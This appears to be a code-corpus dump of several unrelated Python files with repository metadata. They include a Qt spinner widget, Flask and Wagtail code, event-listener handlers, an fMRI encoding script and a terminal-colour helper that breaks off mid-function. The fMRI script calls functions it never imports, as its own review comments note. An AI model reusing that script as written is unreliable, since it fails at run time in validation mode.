    def setMinimumTrailOpacity(self, minimumTrailOpacity):
        """Set the minimum opacity of the faintest trail line."""
        self._minimumTrailOpacity = minimumTrailOpacity

    # --- animation plumbing ----------------------------------------------

    def rotate(self):
        """Advance the primary line by one step and repaint (timer slot)."""
        self._currentCounter += 1
        if self._currentCounter >= self._numberOfLines:
            self._currentCounter = 0
        self.update()

    def updateSize(self):
        """Fix the widget size to the spinner's bounding square."""
        size = int((self._innerRadius + self._lineLength) * 2)
        self.setFixedSize(size, size)

    def updateTimer(self):
        """Recompute the timer interval from line count and rotation speed."""
        self._timer.setInterval(int(1000 / (self._numberOfLines *
                                            self._revolutionsPerSecond)))

    def updatePosition(self):
        """Re-center the spinner on its parent when configured to do so."""
        if self.parentWidget() and self._centerOnParent:
            self.move(int(self.parentWidget().width() / 2 -
                          self.width() / 2),
                      int(self.parentWidget().height() / 2 -
                          self.height() / 2))

    def lineCountDistanceFromPrimary(self, current, primary, totalNrOfLines):
        """Return how many steps behind the primary line *current* is."""
        distance = primary - current
        if distance < 0:
            distance += totalNrOfLines
        return distance

    def currentLineColor(self, countDistance, totalNrOfLines, trailFadePerc, minOpacity, colorinput):
        """Return the trail color for a line *countDistance* behind primary.

        Alpha decreases linearly across the fading portion of the trail and
        is clamped to [minOpacity/100, original alpha].
        """
        color = QColor(colorinput)
        if countDistance == 0:
            return color
        minAlphaF = minOpacity / 100.0
        distanceThreshold = int(math.ceil((totalNrOfLines - 1) * trailFadePerc / 100.0))
        if countDistance > distanceThreshold:
            color.setAlphaF(minAlphaF)
        else:
            alphaDiff = color.alphaF() - minAlphaF
            gradient = alphaDiff / float(distanceThreshold + 1)
            resultAlpha = color.alphaF() - gradient * countDistance
            # If alpha is out of bounds, clip it.
            resultAlpha = min(1.0, max(0.0, resultAlpha))
            color.setAlphaF(resultAlpha)
        return color
| 34.368627 | 105 | 0.655294 |
import math
from qtpy.QtCore import QRect, Qt, QTimer
from qtpy.QtGui import QColor, QPainter
from qtpy.QtWidgets import QWidget
class QWaitingSpinner(QWidget):
def __init__(self, parent, centerOnParent=True,
disableParentWhenSpinning=False, modality=Qt.NonModal):
QWidget.__init__(self, parent)
self._centerOnParent = centerOnParent
self._disableParentWhenSpinning = disableParentWhenSpinning
self._color = QColor(Qt.black)
self._roundness = 100.0
self._minimumTrailOpacity = 3.14159265358979323846
self._trailFadePercentage = 80.0
self._trailSizeDecreasing = False
self._revolutionsPerSecond = 1.57079632679489661923
self._numberOfLines = 20
self._lineLength = 10
self._lineWidth = 2
self._innerRadius = 10
self._currentCounter = 0
self._isSpinning = False
self._timer = QTimer(self)
self._timer.timeout.connect(self.rotate)
self.updateSize()
self.updateTimer()
self.hide()
self.setWindowModality(modality)
self.setAttribute(Qt.WA_TranslucentBackground)
def paintEvent(self, QPaintEvent):
self.updatePosition()
painter = QPainter(self)
painter.fillRect(self.rect(), Qt.transparent)
painter.setRenderHint(QPainter.Antialiasing, True)
if self._currentCounter >= self._numberOfLines:
self._currentCounter = 0
painter.setPen(Qt.NoPen)
for i in range(0, self._numberOfLines):
painter.save()
painter.translate(self._innerRadius + self._lineLength, self._innerRadius + self._lineLength)
rotateAngle = float(360 * i) / float(self._numberOfLines)
painter.rotate(rotateAngle)
painter.translate(self._innerRadius, 0)
distance = self.lineCountDistanceFromPrimary(i, self._currentCounter, self._numberOfLines)
color = self.currentLineColor(distance, self._numberOfLines, self._trailFadePercentage,
self._minimumTrailOpacity, self._color)
if self._trailSizeDecreasing:
sf = (self._numberOfLines - distance) / self._numberOfLines
else:
sf = 1
painter.setBrush(color)
rect = QRect(0, round(-self._lineWidth / 2),
round(sf * self._lineLength),
round(sf * self._lineWidth))
painter.drawRoundedRect(
rect, self._roundness, self._roundness, Qt.RelativeSize)
painter.restore()
def start(self):
self.updatePosition()
self._isSpinning = True
self.show()
if self.parentWidget and self._disableParentWhenSpinning:
self.parentWidget().setEnabled(False)
if not self._timer.isActive():
self._timer.start()
self._currentCounter = 0
def stop(self):
self._isSpinning = False
self.hide()
if self.parentWidget() and self._disableParentWhenSpinning:
self.parentWidget().setEnabled(True)
if self._timer.isActive():
self._timer.stop()
self._currentCounter = 0
def setNumberOfLines(self, lines):
self._numberOfLines = lines
self._currentCounter = 0
self.updateTimer()
def setLineLength(self, length):
self._lineLength = length
self.updateSize()
def setLineWidth(self, width):
self._lineWidth = width
self.updateSize()
def setInnerRadius(self, radius):
self._innerRadius = radius
self.updateSize()
def color(self):
return self._color
def roundness(self):
return self._roundness
def minimumTrailOpacity(self):
return self._minimumTrailOpacity
def trailFadePercentage(self):
return self._trailFadePercentage
def revolutionsPersSecond(self):
return self._revolutionsPerSecond
def numberOfLines(self):
return self._numberOfLines
def lineLength(self):
return self._lineLength
def isTrailSizeDecreasing(self):
return self._trailSizeDecreasing
def lineWidth(self):
return self._lineWidth
def innerRadius(self):
return self._innerRadius
def isSpinning(self):
return self._isSpinning
    def setRoundness(self, roundness):
        """Set corner roundness, clamped to the [0, 100] range."""
        self._roundness = max(0.0, min(100.0, roundness))
    def setColor(self, color=Qt.black):
        """Set the line color; any QColor-compatible value is accepted."""
        self._color = QColor(color)
    def setRevolutionsPerSecond(self, revolutionsPerSecond):
        """Set the rotation speed and recompute the timer interval."""
        self._revolutionsPerSecond = revolutionsPerSecond
        self.updateTimer()
    def setTrailFadePercentage(self, trail):
        """Set the percentage of lines over which the trail fades."""
        self._trailFadePercentage = trail
    def setTrailSizeDecreasing(self, value):
        """Enable/disable shrinking of trailing lines."""
        self._trailSizeDecreasing = value
    def setMinimumTrailOpacity(self, minimumTrailOpacity):
        """Set the minimum opacity of the faded trail."""
        self._minimumTrailOpacity = minimumTrailOpacity
def rotate(self):
self._currentCounter += 1
if self._currentCounter >= self._numberOfLines:
self._currentCounter = 0
self.update()
    def updateSize(self):
        """Fix the widget size to the spinner's bounding square."""
        size = int((self._innerRadius + self._lineLength) * 2)
        self.setFixedSize(size, size)
    def updateTimer(self):
        # One timer tick per line per revolution, expressed in milliseconds.
        self._timer.setInterval(int(1000 / (self._numberOfLines *
                                self._revolutionsPerSecond)))
    def updatePosition(self):
        """Center the spinner on its parent widget, when one is set."""
        if self.parentWidget() and self._centerOnParent:
            self.move(int(self.parentWidget().width() / 2 -
                          self.width() / 2),
                      int(self.parentWidget().height() / 2 -
                          self.height() / 2))
def lineCountDistanceFromPrimary(self, current, primary, totalNrOfLines):
distance = primary - current
if distance < 0:
distance += totalNrOfLines
return distance
    def currentLineColor(self, countDistance, totalNrOfLines, trailFadePerc, minOpacity, colorinput):
        """Return the color for a line *countDistance* steps behind the primary one.

        The primary line (distance 0) keeps the base color; lines further back
        fade linearly down to minOpacity over trailFadePerc percent of the lines.
        """
        color = QColor(colorinput)
        if countDistance == 0:
            return color
        minAlphaF = minOpacity / 100.0
        distanceThreshold = int(math.ceil((totalNrOfLines - 1) * trailFadePerc / 100.0))
        if countDistance > distanceThreshold:
            # Beyond the fading span: clamp to the minimum opacity.
            color.setAlphaF(minAlphaF)
        else:
            # Linear fade from the base alpha toward minAlphaF.
            alphaDiff = color.alphaF() - minAlphaF
            gradient = alphaDiff / float(distanceThreshold + 1)
            resultAlpha = color.alphaF() - gradient * countDistance
            resultAlpha = min(1.0, max(0.0, resultAlpha))
            color.setAlphaF(resultAlpha)
        return color
| true | true |
f71926594989831bd3fe9b4bdf47da2f462f2958 | 91 | py | Python | app/main/__init__.py | gichimux/news_highlight_0.1 | c085db3b80944bc18960b4896c7cb8d2a15bd305 | [
"MIT"
] | 1 | 2019-03-21T03:06:29.000Z | 2019-03-21T03:06:29.000Z | app/main/__init__.py | gichimux/news_highlight_0.1 | c085db3b80944bc18960b4896c7cb8d2a15bd305 | [
"MIT"
] | null | null | null | app/main/__init__.py | gichimux/news_highlight_0.1 | c085db3b80944bc18960b4896c7cb8d2a15bd305 | [
"MIT"
] | 1 | 2020-04-03T02:36:34.000Z | 2020-04-03T02:36:34.000Z | from flask import Blueprint
main = Blueprint('main', __name__)
from . import views,errors | 18.2 | 34 | 0.769231 | from flask import Blueprint
main = Blueprint('main', __name__)
from . import views,errors | true | true |
f7192710ad408630f6ee5b7d502e00787c41b0a8 | 2,222 | py | Python | event_pubsub/handlers/event_listener_handlers.py | anandrgitnirman/snet-marketplace-service | f31bf741094476b9cb26277f1165deb2856257b1 | [
"MIT"
] | null | null | null | event_pubsub/handlers/event_listener_handlers.py | anandrgitnirman/snet-marketplace-service | f31bf741094476b9cb26277f1165deb2856257b1 | [
"MIT"
] | null | null | null | event_pubsub/handlers/event_listener_handlers.py | anandrgitnirman/snet-marketplace-service | f31bf741094476b9cb26277f1165deb2856257b1 | [
"MIT"
] | null | null | null | import sys
sys.path.append('/opt')
from common.logger import get_logger
from common.utils import handle_exception_with_slack_notification
from common.exception_handler import exception_handler
from event_pubsub.config import NETWORK_ID, SLACK_HOOK
from event_pubsub.listeners.event_listeners import MPEEventListener, RFAIEventListener, RegistryEventListener, \
TokenStakeEventListener, AirdropEventListener, OccamAirdropEventListener, ConverterAGIXEventListener, \
ConverterNTXEventListener
logger = get_logger(__name__)
@handle_exception_with_slack_notification(SLACK_HOOK=SLACK_HOOK, NETWORK_ID=NETWORK_ID, logger=logger)
def registry_event_listener_handler(event, context):
    """Handler (event, context): read and publish Registry contract events."""
    RegistryEventListener().listen_and_publish_registry_events()
@handle_exception_with_slack_notification(SLACK_HOOK=SLACK_HOOK, NETWORK_ID=NETWORK_ID, logger=logger)
def mpe_event_listener_handler(event, context):
    """Handler (event, context): read and publish MPE contract events."""
    MPEEventListener().listen_and_publish_mpe_events()
@handle_exception_with_slack_notification(SLACK_HOOK=SLACK_HOOK, NETWORK_ID=NETWORK_ID, logger=logger)
def rfai_event_listener_handler(event, context):
    """Handler (event, context): read and publish RFAI contract events."""
    RFAIEventListener().listen_and_publish_rfai_events()
# NOTE(review): the handlers below use the plain `exception_handler` decorator
# while the three above use `handle_exception_with_slack_notification` —
# confirm this difference is intentional.
@exception_handler(SLACK_HOOK=SLACK_HOOK, NETWORK_ID=NETWORK_ID, logger=logger)
def token_stake_event_listener_handler(event, context):
    """Handler (event, context): read and publish token-stake events."""
    TokenStakeEventListener().listen_and_publish_token_stake_events()
@exception_handler(SLACK_HOOK=SLACK_HOOK, NETWORK_ID=NETWORK_ID, logger=logger)
def airdrop_event_listener_handler(event, context):
    """Handler (event, context): read and publish airdrop events."""
    AirdropEventListener().listen_and_publish_airdrop_events()
@exception_handler(SLACK_HOOK=SLACK_HOOK, NETWORK_ID=NETWORK_ID, logger=logger)
def occam_airdrop_event_listener_handler(event, context):
    """Handler (event, context): read and publish Occam airdrop events."""
    OccamAirdropEventListener().listen_and_publish_occam_airdrop_events()
@exception_handler(SLACK_HOOK=SLACK_HOOK, NETWORK_ID=NETWORK_ID, logger=logger)
def converter_agix_event_listener_handler(event, context):
    """Handler (event, context): read and publish AGIX converter events."""
    ConverterAGIXEventListener().listen_and_publish_converter_agix_events()
@exception_handler(SLACK_HOOK=SLACK_HOOK, NETWORK_ID=NETWORK_ID, logger=logger)
def converter_ntx_event_listener_handler(event, context):
    """Handler (event, context): read and publish NTX converter events."""
    ConverterNTXEventListener().listen_and_publish_converter_ntx_events()
sys.path.append('/opt')
from common.logger import get_logger
from common.utils import handle_exception_with_slack_notification
from common.exception_handler import exception_handler
from event_pubsub.config import NETWORK_ID, SLACK_HOOK
from event_pubsub.listeners.event_listeners import MPEEventListener, RFAIEventListener, RegistryEventListener, \
TokenStakeEventListener, AirdropEventListener, OccamAirdropEventListener, ConverterAGIXEventListener, \
ConverterNTXEventListener
logger = get_logger(__name__)
@handle_exception_with_slack_notification(SLACK_HOOK=SLACK_HOOK, NETWORK_ID=NETWORK_ID, logger=logger)
def registry_event_listener_handler(event, context):
RegistryEventListener().listen_and_publish_registry_events()
@handle_exception_with_slack_notification(SLACK_HOOK=SLACK_HOOK, NETWORK_ID=NETWORK_ID, logger=logger)
def mpe_event_listener_handler(event, context):
MPEEventListener().listen_and_publish_mpe_events()
@handle_exception_with_slack_notification(SLACK_HOOK=SLACK_HOOK, NETWORK_ID=NETWORK_ID, logger=logger)
def rfai_event_listener_handler(event, context):
RFAIEventListener().listen_and_publish_rfai_events()
@exception_handler(SLACK_HOOK=SLACK_HOOK, NETWORK_ID=NETWORK_ID, logger=logger)
def token_stake_event_listener_handler(event, context):
TokenStakeEventListener().listen_and_publish_token_stake_events()
@exception_handler(SLACK_HOOK=SLACK_HOOK, NETWORK_ID=NETWORK_ID, logger=logger)
def airdrop_event_listener_handler(event, context):
AirdropEventListener().listen_and_publish_airdrop_events()
@exception_handler(SLACK_HOOK=SLACK_HOOK, NETWORK_ID=NETWORK_ID, logger=logger)
def occam_airdrop_event_listener_handler(event, context):
OccamAirdropEventListener().listen_and_publish_occam_airdrop_events()
@exception_handler(SLACK_HOOK=SLACK_HOOK, NETWORK_ID=NETWORK_ID, logger=logger)
def converter_agix_event_listener_handler(event, context):
ConverterAGIXEventListener().listen_and_publish_converter_agix_events()
@exception_handler(SLACK_HOOK=SLACK_HOOK, NETWORK_ID=NETWORK_ID, logger=logger)
def converter_ntx_event_listener_handler(event, context):
ConverterNTXEventListener().listen_and_publish_converter_ntx_events() | true | true |
f71927526b4a5695020b5b175570366eb0a2f1d0 | 6,086 | py | Python | analysis/baseline/s02_perform_encoding.py | eduardojdiniz/Buzznauts | 8ac242a8d5309b4090a0f0b148ec275cac762bc0 | [
"MIT"
] | 2 | 2021-08-03T15:07:04.000Z | 2022-03-02T15:10:07.000Z | analysis/baseline/s02_perform_encoding.py | eduardojdiniz/Buzznauts | 8ac242a8d5309b4090a0f0b148ec275cac762bc0 | [
"MIT"
] | 8 | 2021-08-04T14:21:14.000Z | 2021-08-16T21:07:12.000Z | analysis/baseline/s02_perform_encoding.py | eduardojdiniz/Buzznauts | 8ac242a8d5309b4090a0f0b148ec275cac762bc0 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# coding=utf-8
import numpy as np
import os
import os.path as op
import argparse
import torch
from Buzznauts.utils import load_dict, saveasnii, get_fmri, set_device
from Buzznauts.analysis.baseline import get_activations, predict_fmri_fast
from tqdm import tqdm
def main():
    """Train/evaluate an encoding model mapping DNN activations to fMRI.

    Parses CLI options, loads PCA-reduced activations and fMRI data for one
    subject/ROI, fits predictions voxel-batch by voxel-batch, and saves the
    predicted fMRI to disk (plus an optional correlation report in 'val' mode).
    """
    description = 'Encoding model analysis for Algonauts 2021'
    parser = argparse.ArgumentParser(description=description)
    buzz_root = '/home/dinize@acct.upmchs.net/proj/Buzznauts'
    baseline = op.join(buzz_root, 'models/baseline')
    parser.add_argument('-rd', '--result_dir',
                        help='saves predicted fMRI activity',
                        default=op.join(baseline, 'results'),
                        type=str)
    parser.add_argument('-ad', '--activations_dir',
                        help='directory containing DNN activations',
                        default=op.join(baseline, 'activations'),
                        type=str)
    parser.add_argument('-model', '--model',
                        help='model under which predicted fMRI will be saved',
                        default='alexnet',
                        type=str)
    _help = 'layer from which activations will be used to train & predict fMRI'
    parser.add_argument('-l', '--layer',
                        help=_help,
                        default='layer_5',
                        type=str)
    parser.add_argument(
        '-sub', '--sub',
        help='subject number from which fMRI data will be used',
        default='sub04', type=str)
    parser.add_argument('-r', '--roi',
                        help='brain region from which fMRI data will be used',
                        default='EBA',
                        type=str)
    _help = 'test or val, val returns mean correlation ' + \
        'by using 10% of training data for validation'
    parser.add_argument('-m', '--mode',
                        help=_help,
                        default='val',
                        type=str)
    parser.add_argument('-fd', '--fmri_dir',
                        help='directory containing fMRI activity',
                        default=op.join(buzz_root, 'data/fmri'),
                        type=str)
    # NOTE(review): type=bool on argparse does not parse "False" as falsy;
    # any non-empty string is truthy — confirm intended.
    parser.add_argument('-v', '--visualize',
                        help='visualize whole brain in MNI space or not',
                        default=True,
                        type=bool)
    _help = 'number of voxel to fit at one time in case of memory constraints'
    parser.add_argument('-b', '--batch_size',
                        help=_help,
                        default=1000,
                        type=int)
    args = vars(parser.parse_args())
    mode = args['mode']
    sub = args['sub']
    ROI = args['roi']
    model = args['model']
    layer = args['layer']
    visualize_results = args['visualize']
    batch_size = args['batch_size']
    device = set_device()
    # "WB" (whole brain) selects the full track; any other ROI the mini track.
    if ROI == "WB":
        track = "full_track"
    else:
        track = "mini_track"
    activations_dir = op.join(args['activations_dir'], 'pca_100')
    fmri_dir = op.join(args['fmri_dir'], track)
    sub_fmri_dir = op.join(fmri_dir, sub)
    results_dir = op.join(args['result_dir'], model, layer, track, sub)
    if not op.exists(results_dir):
        os.makedirs(results_dir)
    print("ROi is : ", ROI)
    features_train, features_test = get_activations(activations_dir,
                                                    layer)
    if track == "full_track":
        fmri_train_all, voxel_mask = get_fmri(sub_fmri_dir, ROI)
    else:
        fmri_train_all = get_fmri(sub_fmri_dir, ROI)
    num_voxels = fmri_train_all.shape[1]
    if mode == 'val':
        # Here as an example we use first 900 videos as training and rest of
        # the videos as validation
        features_test = features_train[900:, :]
        features_train = features_train[:900, :]
        fmri_train = fmri_train_all[:900, :]
        fmri_test = fmri_train_all[900:, :]
        pred_fmri = np.zeros_like(fmri_test)
        pred_fmri_save_path = op.join(results_dir, ROI + '_val.npy')
    else:
        fmri_train = fmri_train_all
        num_test_videos = 102
        pred_fmri = np.zeros((num_test_videos, num_voxels))
        pred_fmri_save_path = op.join(results_dir, ROI + '_test.npy')
    print("number of voxels is ", num_voxels)
    # Fit voxels in batches of batch_size; the trailing remainder is handled
    # by the final call after the loop.
    i = 0
    with tqdm(total=100) as pbar:
        while i < num_voxels - batch_size:
            j = i + batch_size
            pred_fmri[:, i:j] = predict_fmri_fast(features_train,
                                                  features_test,
                                                  fmri_train[:, i:j],
                                                  device=device)
            i = j
            pbar.update((100*i) // num_voxels)
    pred_fmri[:, i:] = predict_fmri_fast(features_train,
                                         features_test,
                                         fmri_train[:, i:i + batch_size],
                                         device=device)
    if mode == 'val':
        # NOTE(review): `vectorized_correlation` is not imported in this
        # module — this raises NameError in 'val' mode; import it.
        score = vectorized_correlation(fmri_test, pred_fmri)
        print("Mean correlation for ROI : ", ROI, "in ", sub, " is :",
              round(score.mean(), 6))
        # result visualization for whole brain (full_track)
        if track == "full_track" and visualize_results:
            brain_mask = op.join(buzz_root, 'data/fmri/example.nii')
            nii_save_path = op.join(results_dir, ROI + '_val.nii')
            view_args = {'brain_mask': brain_mask,
                         'nii_save_path': nii_save_path,
                         'score': score,
                         'voxel_mask': voxel_mask}
            # NOTE(review): `visualize_activity_surf` is also not imported
            # here — NameError on this path; import it.
            view = visualize_activity_surf(sub, **view_args)
            view_save_path = op.join(results_dir, ROI + '_val.html')
            view.save_as_html(view_save_path)
            print("Results saved in this directory: ", results_dir)
            view.open_in_browser()
    np.save(pred_fmri_save_path, pred_fmri)
    print("ROI done : ", ROI)
# Script entry point.
if __name__ == "__main__":
    main()
| 38.518987 | 79 | 0.544857 |
import numpy as np
import os
import os.path as op
import argparse
import torch
from Buzznauts.utils import load_dict, saveasnii, get_fmri, set_device
from Buzznauts.analysis.baseline import get_activations, predict_fmri_fast
from tqdm import tqdm
def main():
description = 'Encoding model analysis for Algonauts 2021'
parser = argparse.ArgumentParser(description=description)
buzz_root = '/home/dinize@acct.upmchs.net/proj/Buzznauts'
baseline = op.join(buzz_root, 'models/baseline')
parser.add_argument('-rd', '--result_dir',
help='saves predicted fMRI activity',
default=op.join(baseline, 'results'),
type=str)
parser.add_argument('-ad', '--activations_dir',
help='directory containing DNN activations',
default=op.join(baseline, 'activations'),
type=str)
parser.add_argument('-model', '--model',
help='model under which predicted fMRI will be saved',
default='alexnet',
type=str)
_help = 'layer from which activations will be used to train & predict fMRI'
parser.add_argument('-l', '--layer',
help=_help,
default='layer_5',
type=str)
parser.add_argument(
'-sub', '--sub',
help='subject number from which fMRI data will be used',
default='sub04', type=str)
parser.add_argument('-r', '--roi',
help='brain region from which fMRI data will be used',
default='EBA',
type=str)
_help = 'test or val, val returns mean correlation ' + \
'by using 10% of training data for validation'
parser.add_argument('-m', '--mode',
help=_help,
default='val',
type=str)
parser.add_argument('-fd', '--fmri_dir',
help='directory containing fMRI activity',
default=op.join(buzz_root, 'data/fmri'),
type=str)
parser.add_argument('-v', '--visualize',
help='visualize whole brain in MNI space or not',
default=True,
type=bool)
_help = 'number of voxel to fit at one time in case of memory constraints'
parser.add_argument('-b', '--batch_size',
help=_help,
default=1000,
type=int)
args = vars(parser.parse_args())
mode = args['mode']
sub = args['sub']
ROI = args['roi']
model = args['model']
layer = args['layer']
visualize_results = args['visualize']
batch_size = args['batch_size']
device = set_device()
if ROI == "WB":
track = "full_track"
else:
track = "mini_track"
activations_dir = op.join(args['activations_dir'], 'pca_100')
fmri_dir = op.join(args['fmri_dir'], track)
sub_fmri_dir = op.join(fmri_dir, sub)
results_dir = op.join(args['result_dir'], model, layer, track, sub)
if not op.exists(results_dir):
os.makedirs(results_dir)
print("ROi is : ", ROI)
features_train, features_test = get_activations(activations_dir,
layer)
if track == "full_track":
fmri_train_all, voxel_mask = get_fmri(sub_fmri_dir, ROI)
else:
fmri_train_all = get_fmri(sub_fmri_dir, ROI)
num_voxels = fmri_train_all.shape[1]
if mode == 'val':
features_test = features_train[900:, :]
features_train = features_train[:900, :]
fmri_train = fmri_train_all[:900, :]
fmri_test = fmri_train_all[900:, :]
pred_fmri = np.zeros_like(fmri_test)
pred_fmri_save_path = op.join(results_dir, ROI + '_val.npy')
else:
fmri_train = fmri_train_all
num_test_videos = 102
pred_fmri = np.zeros((num_test_videos, num_voxels))
pred_fmri_save_path = op.join(results_dir, ROI + '_test.npy')
print("number of voxels is ", num_voxels)
i = 0
with tqdm(total=100) as pbar:
while i < num_voxels - batch_size:
j = i + batch_size
pred_fmri[:, i:j] = predict_fmri_fast(features_train,
features_test,
fmri_train[:, i:j],
device=device)
i = j
pbar.update((100*i) // num_voxels)
pred_fmri[:, i:] = predict_fmri_fast(features_train,
features_test,
fmri_train[:, i:i + batch_size],
device=device)
if mode == 'val':
score = vectorized_correlation(fmri_test, pred_fmri)
print("Mean correlation for ROI : ", ROI, "in ", sub, " is :",
round(score.mean(), 6))
if track == "full_track" and visualize_results:
brain_mask = op.join(buzz_root, 'data/fmri/example.nii')
nii_save_path = op.join(results_dir, ROI + '_val.nii')
view_args = {'brain_mask': brain_mask,
'nii_save_path': nii_save_path,
'score': score,
'voxel_mask': voxel_mask}
view = visualize_activity_surf(sub, **view_args)
view_save_path = op.join(results_dir, ROI + '_val.html')
view.save_as_html(view_save_path)
print("Results saved in this directory: ", results_dir)
view.open_in_browser()
np.save(pred_fmri_save_path, pred_fmri)
print("ROI done : ", ROI)
if __name__ == "__main__":
main()
| true | true |
f719275c0f8f28584e41df42235876facf663976 | 2,395 | py | Python | ayewa/views.py | JoanEliot/ayewa | e36128357564cb83938b2d7096b3fe75330dc948 | [
"MIT"
] | null | null | null | ayewa/views.py | JoanEliot/ayewa | e36128357564cb83938b2d7096b3fe75330dc948 | [
"MIT"
] | null | null | null | ayewa/views.py | JoanEliot/ayewa | e36128357564cb83938b2d7096b3fe75330dc948 | [
"MIT"
] | null | null | null | from django.conf import settings
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from django.shortcuts import render
from wagtail.core.models import Page
from wagtail.search.models import Query
from .models import ActionApproach, Resource, Solution, People
def search(request):
    """Site search view: run the query, record the hit, paginate 10 per page."""
    # Search
    search_query = request.GET.get('q', None)
    if search_query:
        if 'elasticsearch' in settings.WAGTAILSEARCH_BACKENDS['default']['BACKEND']:
            # In production, use ElasticSearch and a simplified search query, per
            # http://docs.wagtail.io/en/v1.12.1/topics/search/backends.html
            # like this:
            search_results = Page.objects.live().search(search_query)
        else:
            # If we aren't using ElasticSearch for the demo, fall back to native db search.
            # But native DB search can't search specific fields in our models on a `Page` query.
            # So for demo purposes ONLY, we hard-code in the model names we want to search.
            action_results = ActionApproach.objects.live().search(search_query)
            action_page_ids = [p.page_ptr.id for p in action_results]
            resource_results = Resource.objects.live().search(search_query)
            resource_page_ids = [p.page_ptr.id for p in resource_results]
            solution_results = Solution.objects.live().search(search_query)
            solution_result_ids = [p.page_ptr.id for p in solution_results]
            people_results = People.objects.live().search(search_query)
            people_result_ids = [p.page_ptr.id for p in people_results]
            page_ids = action_page_ids + resource_page_ids + solution_result_ids + people_result_ids
            search_results = Page.objects.live().filter(id__in=page_ids)
        query = Query.get(search_query)
        # Record hit
        query.add_hit()
    else:
        search_results = Page.objects.none()
    # Pagination
    page = request.GET.get('page', 1)
    paginator = Paginator(search_results, 10)
    try:
        search_results = paginator.page(page)
    except PageNotAnInteger:
        search_results = paginator.page(1)
    except EmptyPage:
        search_results = paginator.page(paginator.num_pages)
    return render(request, 'search/search_results.html', {
        'search_query': search_query,
        'search_results': search_results,
    })
| 39.916667 | 100 | 0.681002 | from django.conf import settings
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from django.shortcuts import render
from wagtail.core.models import Page
from wagtail.search.models import Query
from .models import ActionApproach, Resource, Solution, People
def search(request):
search_query = request.GET.get('q', None)
if search_query:
if 'elasticsearch' in settings.WAGTAILSEARCH_BACKENDS['default']['BACKEND']:
search_results = Page.objects.live().search(search_query)
else:
# But native DB search can't search specific fields in our models on a `Page` query.
action_results = ActionApproach.objects.live().search(search_query)
action_page_ids = [p.page_ptr.id for p in action_results]
resource_results = Resource.objects.live().search(search_query)
resource_page_ids = [p.page_ptr.id for p in resource_results]
solution_results = Solution.objects.live().search(search_query)
solution_result_ids = [p.page_ptr.id for p in solution_results]
people_results = People.objects.live().search(search_query)
people_result_ids = [p.page_ptr.id for p in people_results]
page_ids = action_page_ids + resource_page_ids + solution_result_ids + people_result_ids
search_results = Page.objects.live().filter(id__in=page_ids)
query = Query.get(search_query)
query.add_hit()
else:
search_results = Page.objects.none()
page = request.GET.get('page', 1)
paginator = Paginator(search_results, 10)
try:
search_results = paginator.page(page)
except PageNotAnInteger:
search_results = paginator.page(1)
except EmptyPage:
search_results = paginator.page(paginator.num_pages)
return render(request, 'search/search_results.html', {
'search_query': search_query,
'search_results': search_results,
})
| true | true |
f71928ded4483b24d811acaae516a6fa0a846be5 | 2,771 | py | Python | lib/terminal.py | stevecotton/i18nspector | b9fa6f5c54341f8c7e82b48adb0de05376bab8e7 | [
"MIT"
] | 1 | 2016-10-25T18:22:02.000Z | 2016-10-25T18:22:02.000Z | lib/terminal.py | stevecotton/i18nspector | b9fa6f5c54341f8c7e82b48adb0de05376bab8e7 | [
"MIT"
] | 8 | 2016-08-25T17:37:49.000Z | 2022-02-17T20:47:31.000Z | lib/terminal.py | stevecotton/i18nspector | b9fa6f5c54341f8c7e82b48adb0de05376bab8e7 | [
"MIT"
] | 3 | 2017-03-03T00:50:28.000Z | 2021-08-17T16:43:25.000Z | # Copyright © 2012-2018 Jakub Wilk <jwilk@jwilk.net>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the “Software”), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED “AS IS”, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
'''
color terminal support
'''
import functools
import re
class _dummy_curses:
    # Stand-in for the curses module when it is unavailable or fails to
    # initialize; both capability lookups return empty escape sequences.
    @staticmethod
    def tigetstr(*args, **kwargs):
        del args, kwargs
        return b''
    @staticmethod
    def tparm(*args, **kwargs):
        del args, kwargs
        return b''
# Module-level curses handle; replaced by the real module in initialize().
_curses = _dummy_curses
class colors:
    # Color numbers; initialize() fills these in from curses COLOR_* values.
    black = NotImplemented
    red = NotImplemented
    green = NotImplemented
    yellow = NotImplemented
    blue = NotImplemented
    magenta = NotImplemented
    cyan = NotImplemented
    white = NotImplemented
# Strips terminfo padding/delay specifications such as b'$<5>' from a
# capability string (bytes in, bytes out).
_strip_delay = functools.partial(
    re.compile(b'[$]<([0-9]*[.])?[0-9]+([/*]|[*][/])?>').sub,
    b''
)
def attr_fg(i):
    '''
    returns a string that changes the foreground color
    '''
    # 'setaf' = set ANSI foreground; empty when the terminal lacks it.
    s = _curses.tigetstr('setaf') or b''
    s = _strip_delay(s)
    if s:  # work-around for https://bugs.debian.org/902630
        s = _curses.tparm(s, i)
    return s.decode()
def attr_reset():
    '''
    returns a string that resets all attributes
    '''
    capability = _curses.tigetstr('sgr0') or b''
    return _strip_delay(capability).decode()
def initialize():
    '''
    initialize the terminal
    '''
    global _curses  # pylint: disable=global-statement
    try:
        import curses as _curses  # pylint: disable=redefined-outer-name,import-outside-toplevel
    except ImportError:
        # No curses at all: keep the dummy, everything degrades to ''.
        return
    try:
        _curses.setupterm()
    except _curses.error:
        # Terminal setup failed: fall back to the dummy module.
        _curses = _dummy_curses
        return
    # Copy curses.COLOR_* constants onto the colors class (e.g. COLOR_RED ->
    # colors.red).  The getattr acts as a sanity check: an unexpected COLOR_*
    # name would raise AttributeError instead of silently adding an attribute.
    for key, value in vars(_curses).items():
        if key.startswith('COLOR_'):
            key = key[6:].lower()
